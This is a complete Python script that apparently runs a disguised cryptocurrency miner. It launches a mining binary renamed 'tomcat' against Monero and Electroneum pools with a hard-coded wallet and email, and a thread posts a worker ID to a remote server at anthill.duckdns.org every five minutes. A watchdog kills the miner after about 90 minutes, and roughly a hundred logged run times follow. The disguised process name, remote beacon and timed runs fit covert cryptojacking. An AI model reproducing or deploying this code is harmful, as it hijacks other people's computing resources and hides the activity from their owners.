import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:47:06.256012
#2018-02-17 17:36:07.934938
#2018-02-17 19:24:04.793967
#2018-02-17 21:13:01.962730
#2018-02-17 22:56:07.936817
#2018-02-18 00:43:05.821851
#2018-02-18 02:33:03.424632
#2018-02-18 04:20:01.751339
#2018-02-18 06:11:05.134815
#2018-02-18 08:00:04.855409
#2018-02-18 09:48:01.467769
#2018-02-18 11:35:01.287102
#2018-02-18 13:20:08.374716
#2018-02-18 15:10:03.922044
#2018-02-18 16:58:06.604013
#2018-02-18 18:46:01.614093
#2018-02-18 20:32:06.719981
#2018-02-18 22:18:06.025289
#2018-02-19 00:07:04.944949
#2018-02-19 01:53:05.613459
#2018-02-19 03:39:07.535075
#2018-02-19 05:24:05.239292
#2018-02-19 07:13:04.335265
#2018-02-19 09:02:08.368677
#2018-02-19 10:50:07.040316
#2018-02-19 12:38:04.849591
#2018-02-19 14:26:05.887055
#2018-02-19 16:14:05.596311
#2018-02-19 18:01:01.272643
#2018-02-19 19:47:07.086855
#2018-02-19 21:36:05.210570
#2018-02-19 23:22:01.964883
#2018-02-20 01:08:04.908266
#2018-02-20 02:57:05.279100
#2018-02-20 04:46:05.558846
#2018-02-20 06:30:09.144739
#2018-02-20 08:15:08.584322
#2018-02-20 10:00:06.890262
#2018-02-20 11:44:07.423043
#2018-02-20 13:32:08.493933
#2018-02-20 15:16:06.090897
#2018-02-20 17:03:05.372666
#2018-02-20 18:52:06.352751
#2018-02-20 20:44:07.982536
#2018-02-20 22:28:08.350487
#2018-02-21 00:10:08.376277
#2018-02-21 01:57:01.379742
#2018-02-21 03:45:01.942474
#2018-02-21 05:34:01.328558
#2018-02-21 07:22:07.761101
#2018-02-21 09:07:01.871413
#2018-02-21 10:56:05.534333
#2018-02-21 12:43:07.552072
#2018-02-21 14:31:05.956753
#2018-02-21 16:17:08.386483
#2018-02-21 18:06:07.910187
#2018-02-21 19:54:08.436337
#2018-02-21 21:42:06.897938
#2018-02-21 23:31:04.128819
#2018-02-22 01:18:04.426857
#2018-02-22 03:06:07.778458
#2018-02-22 04:50:03.758645
#2018-02-22 06:35:08.194248
#2018-02-22 08:23:05.866423
#2018-02-22 10:11:07.317786
#2018-02-22 11:57:05.315702
#2018-02-22 13:42:05.905396
#2018-02-22 15:32:01.959880
#2018-02-22 17:18:01.288459
#2018-02-22 19:05:07.684182
#2018-02-22 20:58:07.782876
#2018-02-22 22:45:07.458696
#2018-02-23 00:34:05.906791
#2018-02-23 02:20:08.003467
#2018-02-23 04:07:05.080972
#2018-02-23 05:54:04.311842
#2018-02-23 07:43:01.628960
#2018-02-23 09:47:06.295968
#2018-02-23 11:52:07.338357
#2018-02-23 13:40:10.114041
#2018-02-23 15:28:07.437467
#2018-02-23 17:19:06.269481
#2018-02-23 19:05:06.346815
#2018-02-23 20:51:08.009465
#2018-02-23 22:37:07.321632
#2018-02-24 00:23:06.960406
#2018-02-24 02:15:04.065476
#2018-02-24 04:05:01.319951
#2018-02-24 05:49:02.235374
#2018-02-24 07:40:01.789047
#2018-02-24 09:25:08.565244
#2018-02-24 11:19:05.414899
#2018-02-24 13:08:06.690051
#2018-02-24 15:00:08.314522
#2018-02-24 16:50:07.205711
#2018-02-24 18:38:07.608828
#2018-02-24 20:27:07.085451
#2018-02-24 22:22:07.340783
#2018-02-25 01:29:06.025487
#2018-02-25 04:28:03.815077
#2018-02-25 08:06:06.073982